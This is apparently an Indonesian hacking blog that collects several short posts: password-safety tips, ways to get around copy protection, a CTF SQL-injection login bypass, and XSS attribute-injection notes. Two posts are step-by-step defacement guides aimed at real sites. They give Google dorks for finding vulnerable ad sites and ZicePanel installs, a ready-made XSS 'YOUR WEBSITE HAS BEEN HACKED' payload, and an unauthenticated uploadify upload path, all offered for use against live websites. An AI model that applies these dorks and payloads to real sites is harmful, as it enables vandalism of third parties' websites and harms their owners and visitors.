No Light

Setiap perusahaan penyedia social media pastinya selalu meningkatkan keamanan sistem dengan melakukan maintenance secara rutin berdasakan jadwal atau agenda yang telah di tentukan. Pengamanan secara rutin tidak hanya digunakan untuk mengamankan sistem itu sendiri. Jika sistem yang digunakan mudah dibobol perusahaan akan mendapatkan kehilangan kepercayaan dari pengguna. Pengguna akan enggan menggunakan social media tersebut karena khawatir data dan informasi pribadinya sudah tidak aman lagi.


Meskipun sebuah perusahaan menjaga ketat keamanan sistemnya, siapa sangka kalau akun dari social media dapat dibobol dengan mudah. Kelemahan selain dari sistem adalah pengguna. Pengguna kebanyakan memiliki kebiasaan mengingat kegiatan harian, orang yang penting, tanggal lahir, yang pastinya nama, saudara, keluarga, fans dll. Dengan hal-hal diatas pengguna biasanya membeberkan informasi diatas secara tidak sengaja. Bagi seorang hacker informasi minim ( dapat dikatakan sebagai jarum ) bisa menjadi senjata yang kuat ( seperti pedang ).

Pengguna biasanya sering memposting kegiatan rutinnya semisal kalau setiap pagi selalu sarapan dengan ikan atau setiap hari selalu mengunjungi saudaranya atau selalu memiliki kebiasaan dengan menggunakan angka-angka tertentu semisal “membeli barang dengan jumlah 3, menghitung dengan kelipatan 3 dsb” dengan hal tersebut kebanyakan pengguna akan menggunakannya sebagai PASSWORD akun media social, seperti contoh karena sering berkungjung ke pamannya ( berkungjung -> post ke medsos ) lalu dia menggunakan nama pamannya sebagai password atau menggunakan tanggal lahir sebagai password.

Hal-hal tersebut akan sangat berguna bagi hacker yang setiap saat mengawasi korbannya. Hacker dengan informasi diatas dan analisa yang tinggi dapat menebak password dari akun media social pengguna dengan mudah, tidak perlu membobol sistem keamanan karena pengguna tersebut dengan tanpa sadar sudah memberikan identitasnya sendiri.

Saran / Masukan / Tips & Trik / Pencegahan
Untuk mengatasi hal tersebut cukup simple :
1) Menjaga segala bentuk informasi dan tidak menyebarkan ke internet, public atau media social. Upload kegiatan atau informasi ke medos ini menjadi kebiasaan terkini yang mana itu akan menjadi boomerang bagi diri sendiri.

2) Hindari penggunaan password yang simple seperti 123456, tanggal lahir, nama, tempat dll.

3) Gunakan password yang rumit dan terdiri dari huruf kecil, huruf besar, angka, symbol. Hal ini akan menyulitkan hacker untuk menebak password.

4) Rutin mengganti password bila perlu dan jangan menggunakan satu password untuk banyak akun media social.

Terimakasih sudah membaca artikel ini. Artikel ini untuk memenuhi tugas Keamanan Jaringan

Halo sahabat No Light, bagaimana kabarnya ?? baik-baik saja kan ?? di tutorial ini saya akan membahas tentang cara mengambil atau copas artikel dari website yang sudah di proteksi. Untuk cara sebelumnya sudah saya jelaskan cara Menonaktifkan Fitur Anti Copas. Jika cara tersebut tidak berhasil maka cara ini pastinya berhasil 100%.


Untuk cara ini kalian membutuhkan Microsoft Word, karena kita akan membuka file HTML. Simak langkah-langkah berikut ini :

1) Buka halaman yang ingin anda copas artikelnya.

2) Tekan tombol keyboard Ctrl+S untuk menyimpan halaman websitenya.

3) Setelah Tersimpan buka file HTML tadi dengan Microsoft Word. Klik kanan pada filenya ->  Open With -> Microsoft Office Word.


4) Jika muncul error atau peringatan seperti ini klik OK.


5) Oke, tinggal copas artikelnya.

Happy Copas, semoga bermanfaat dan sampai jumpa pada tutorial berikutnya

Apakabar sahabat No Light ?? di tutorial kali ini saya akan membahas tentang CTF di CTF Learn. CTF Learn mirip dengan HackerRank yang mana jika kita menyelesaikan setiap permasalahan kita akan mendapatkan poin.


Permasalah pertama yang akan saya jelaskan adalah tentang Basic Injection. Untuk menyelesaikan permasalah ini kalian harus memahami tentang SQL Injection, yang dapat dilihat pada tutorial ini Bypass Login Admin. Didalam permasalah ini ada sebuah link yang harus kita injeksi.


Kita dapat menggunakan payload SQL seperti ini

'or''='
'=''or'

Sip, Flag berhasil di dapatkan, selanjutnya kita dapat men-submit flag nya.


Semoga Bermanfaat dan sampai jumpa pada tutorial berikutnya.

Kali ini saya akan membagikan tutorial untuk mendeface website iklan dengan metode XSS. Metode XSS ini boleh disebut dengan metode JSO. Metode ini sangat lah mudah, untuk kode defacenya juga sudah saya siapkan tinggal pakai saja.


Pertama-tama kita cari targetnya terlebih dahulu. Gunakan dork beriku, untuk dork dapat kalian kembangkan sendiri.

intext: "copyright © 2012 PermataIklan.com All Right Reserved"

Buka targetnya, setelah itu klik "Pasang Iklan".


Isi semua data-datanya untuk mengisi alaman website perlu diperhatikan.



Untuk injeksi XSS ke alamat web formatnya seperti ini :

nama.com">kodeXSS

Untuk full kode XSS kalian dapat gunakan dibawah ini :

zero.com"><div style="width:100%;height:100%;text-align:center;font-size:30pt;position:fixed;display:block;top:0;left:0;background:black;color:white;font-family:consolas,monospace;z-index:9999">YOUR WEBSITE HAS BEEN HACKED</div>

Terakhir klik "Pasang". Buka halaman utamanya dan BOOOM!!!. Perlu diperhatikan bahwa kalian tidak bisa terlalu banyak menggunakan Tag HTML, karena tampilannya akan rusak.


Semoga bermanfaat, Happy Hacking. "Deface adalah Seni Hacking".

Halo apa kabar ? di tutorial ini saya akan membagikan sebuah cara untuk mendeface website yang mempunyai tema Zicepanel. Seperti biasa saya tidak akan menjelaskan secara detail. Cara upload file pada tehnik deface ini menggunakan fitur uploadify dari website itu sendiri, dan karena tidak ada filter kita dapat upload file melalui client, hal ini disebut dengan tehnik CSRF.


Oke, langsung saja, pertama-tama kita cari websitenya dengan menggunakan dork :

inurl:/themes/zicepanel/

Untuk dork nya kembangan sendiri, mungkin kalian tambah dengan site, intitle dsb. Setelah kita mendapat targetnya, gunakan exploit berikut untuk mengecek file untuk uploadnya :

Expoit : /themes/zicepanel/components/uploadify/uploadify.php

Sehingga url dari websitenya menjadi seperti ini :

URL : target.com/themes/zicepanel/components/uploadify/uploadify.php

Kalau website tidak menampilkan apapun atau blank berarti website tersebut rentan dan kita dapat upload filenya. Sekarang kita tinggal upload filenya gunakan Uploader dibawah ini :

CSRF ZicePanel File Uploader

Target :


File :

Upload

Disini saya mengupload file HTML, jika muncul seperti dibawah ini berarti upload sudah berhasil.


Setelah itu kalian dapat membuka filenya dengan URL https://www.target.com/namafile yang muncul semisal :

URL : https://www.target.com/L7jeAlgEm2zxpVyX8BnUhubCadtFNks6.html

Jika kita kunjungi hasilnya seperti in :D untuk script deface saya hanya simple seperti ini



Sekian, semoga bermanfaat dan Happy Hacking Brother.

Apakabar sahabat no light ? Pastinya kalian sebel kalau kalian saat ngerjakan tugas dan nemu artikel bagus, tapi eh ketika artikelnya mau di copy paste tidak bisa. Di tutorial kali ini saya akan membagikan sebuah cara untuk mendisable CSS yang digunakan untuk mendisable copy paste artikel.


Ikuti langkah langkah berikut, di tutorial ini saya menggunakan browser firefox yang support dengan Style Editor :

1) Masuk ke Inspect Qlement dengan menekan tombol F12 pada keyboard.

2) Masuk ke tab {} Style Editor.

3) Tunggu browser menampilkan semua CSS nya, klik tanda + untuk menambahkan CSS.


4) Masukan kode CSS berikut :

* {
   -khtml-user-select: text;
   -webkit-user-select: text;
   -moz-user-select: text;
   -ms-user-select: text;
   -o-user-select: text;
    user-select: text;
    unselectable: off;
}

5) Sip, tinggal copas artikel yang kalian butuhkan.

Tapi jika kalian ingin meng-copy artikel yang lain, kalian harus tetap lakukan cara seperti diatas. Jika tidak berhasil kemungkinan proteksi copy pastenya menggunakan Javascript yang akan saya bahas pada tutorial berikutnya.

Sampai jumpa dan semoga bermanfaat.

Apakabar sahabat No Light ? Di tutorial ini akan saya bahas tentang kasus XSS yang pernah saya temui. Jadi setiap tag HTML yang saya masukan selalu di hapus. Tetapi pada kasus ini nilai dari parameter ter-reflected ke tag input. Di tutorial ini saya tidak mencontohkan pada website.


Untuk website yang mempunyai filter seperti ini sangat jarang sekali. Semisal url websitenya seperti ini :

URL : website-ru.sak/search?q=zerobyte

Jika kita melihat pada kode html nya nilai dari parameter "q" ter reflected pada tag input

<input type="text" name="p" value="zerobyte">

Kalau kita memasukan payload seperti pada tutorial berikutnya Mencuri Cookie dengan XSS. Maka tag HTML apapun akan di hapus atau tidak ditampilkan. Karena petik ganda tidak di filter, kita dapat memakai payload seperti dibawah ini :

Payload: " autofocus onfocus="javascript:alert(1)

Sehingga jika payload dimasukan ke kode HTML akan menjadi seperti ini :

<input type="text" name="p" value="" autofocus onfocus="javascript:alert(1)">

Atribut autofocus pada tag input akan membuat inputan tersebut focus ( seperti saat user klik/akan mengisi inputan tersebut ), karena atribut tersebut focus kita dapat memberikan kode javascript yang di handle oleh event onfocus, dimana ketika tag input dalam kondisi focus, kode javascript akan dijalankan.

Maaf jika tidak banyak yang bisa saya sampaikan, sampai jumpa pada tutorial berikutnya.